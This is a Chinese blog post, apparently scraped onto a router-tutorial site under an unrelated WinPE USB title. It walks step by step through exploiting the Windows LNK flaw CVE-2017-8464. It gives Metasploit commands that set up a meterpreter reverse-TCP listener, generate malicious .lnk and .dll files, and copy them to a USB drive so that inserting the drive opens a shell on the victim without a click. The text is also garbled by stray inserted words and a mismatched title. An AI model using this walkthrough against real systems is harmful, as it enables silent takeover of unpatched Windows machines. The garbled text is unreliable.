winpexpu盘-(winpe启动u盘)

来源:191路由网 2022-12-29 23:21:23

(winpe启动u盘)

17年的问题,最近清理以前磁盘的文件发现这个记录文档,写在这里。

引言

微软在2017年6月中旬发布的补丁包中包含了一个关于LNK文件远程代码执行的漏洞,CVE编号为CVE-2017-8464,描述如果系统处理了恶意的.LNK文件,则可能允许远程执行代码,成功利用这个漏洞会获得与本地用户相同的用户权限,攻电脑击者可以通过任意可移动驱动器(如U盘)或者远程共享的方式传播攻击。我们以U盘测试,当受害者主机加载该U盘即会受到攻击,无需受害者手动点击访问U盘,断开U盘shell会话保持。

当时影响任何未安装CVE-2017-8464补丁的Windows系统,可绕过MS10-046 & MS15-020补丁防护,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。

漏洞利用

测试环境:

攻击机:kali 2.0(192.168.80.226)

靶机:win7 x64(192.168.80.114)

1、下载exp放在kali对应目录(新版kali应该已经自带了),此处以放在该测试目录为例(kali2.0:/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali里配置监听

msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.80.226LHOST => 192.168.80.226msf exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started 电脑reverse TCP handler on 192.168.80.226:4444msf exploit(handler) > [*] Starting the payload handler...back

msf > use exploit/windows/smb/cve_2017_8464_lnk_rcemsf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.80.226LHOST => 192.168.80.226

msf exploit(cve_2017_8464_lnk_rce) > exploit

执行成功后会在/root/.msf4/local/*目录生成.dll和.lnk文件

2、在kali里加载U盘,复制文件到U盘根目录

查看加载的U盘:

将kali目录 /root/.msf4/local/* 下的 .lnk文件复制到U盘根目录

电脑

复制完成后的U盘根目录

3、在靶机上插入U盘,无需手动点击访问U盘,靶机即可受到攻击,测试在win7靶机中插入U盘时,kali攻击机收到反弹的shell


点击展开全文

相关阅读

原版win7旗舰版安装-(原版win7旗舰版安装不了)

(原版win7旗舰版安装不了)文/奔浪网-天涯孤客keven香帅keven原著,版权所有由奔浪网-奔浪系统研究实验室-天涯孤客keven(即香帅keven)精减优化的win7pro专业版,win7ultimate旗舰版,win10pro专业版,历经电脑25天夜以继日的连续测试(2021年6月1号,至2021年6月25号),于今天,公元2021年6月26号,正式发布了。并于公元2022年11月1...

2022-12-29

winpexpu盘-(winpe启动u盘)

(winpe启动u盘)17年的问题,最近清理以前磁盘的文件发现这个记录文档,写在这里。引言微软在2017年6月中旬发布的补丁包中包含了一个关于LNK文件远程代码执行的漏洞,CVE编号为CVE-2017-8464,描述如果系统处理了恶意的.LNK文件,则可能允许远程执行代码,成功利...

2022-12-29

acer台式电脑重装系统u盘启动-()

()宏碁E5-473G-55WJ笔记本预装的系统是Win8.1的系统,这个系统本身口碑就没有Win7好,而且还取消了开始菜单,使得很多用户完全用不习惯。想将系统更改为Win7,那今天小编就来分享一下宏碁E5-47...

2022-12-29

win10怎么用pe-(win10怎么用pe备份)

(win10怎么用pe备份)之前笔者写过一篇安装win10系统的教程,原本是没题材情况下随便写着玩得,没想到引起了许多网友的关注。上期教程是教大家通过微软官方的U盘制作工具来安装win10。而在中国登陆微软官方网站速度实在太慢,有网友反映无法下载官方工具,或者制作U盘过程中会有提示失败。接下来我就介绍另外一种安装方法,这种方法的...

2022-12-29

windowsxp突然蓝屏-()

()许多小伙伴们启动电脑上的情况下,发生蓝屏代码0X000000ED状况,进不去安全模式,也没法操作。这是什么情况呢?此类状况一般是因为磁盘存有不正确造成的,例如不法关机,或是电脑硬盘已经读写能力时忽然关闭电源,及其电脑硬盘连线是不是接触不良现象,实际的实例教程下面一起来瞧瞧吧。处理蓝屏0...

2022-12-29

191路由网 - 192.168.1.1,192.168.0.1无线路由器设置教程

版权声明:本站的文章和图片来自互联网收集,仅做分享之用如有侵权请联系站长,我们将在24小时内删除